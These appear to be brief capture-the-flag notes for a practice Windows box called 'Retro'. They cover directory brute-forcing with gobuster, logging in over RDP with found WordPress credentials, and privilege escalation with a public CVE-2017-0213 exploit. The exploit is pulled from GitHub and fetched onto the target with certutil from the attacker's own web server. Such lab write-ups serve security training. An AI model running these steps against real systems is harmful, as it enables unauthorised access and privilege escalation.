10.10.10.10
gobuster dir -u http://10.10.10.10 -w wordlist.txt
/retro /Retro
gobuster dir -u http://10.10.10.10/retro -w wordlist.txt /wp-admin
user: wade pass: parzival
xfreerdp /v:retroweb.thm /u:wade /p:parzival +clipboard /dynamic-resolution user.txt
search history CVE-2019-1388 CVE-2017-0213
wget https://github.com/WindowsExploits/Exploits/raw/master/CVE-2017-0213/Binaries/CVE-2017-0213_x64.zip unzip CVE-2017-0213_x64.zip python3 -m http.server 8000
certutil -urlcache -f http://thmIP:8000/CVE-2017-0213_x64.exe CVE-2017-0213_x64.exe C:\Users\Administrator\Desktop> more root.txt.txt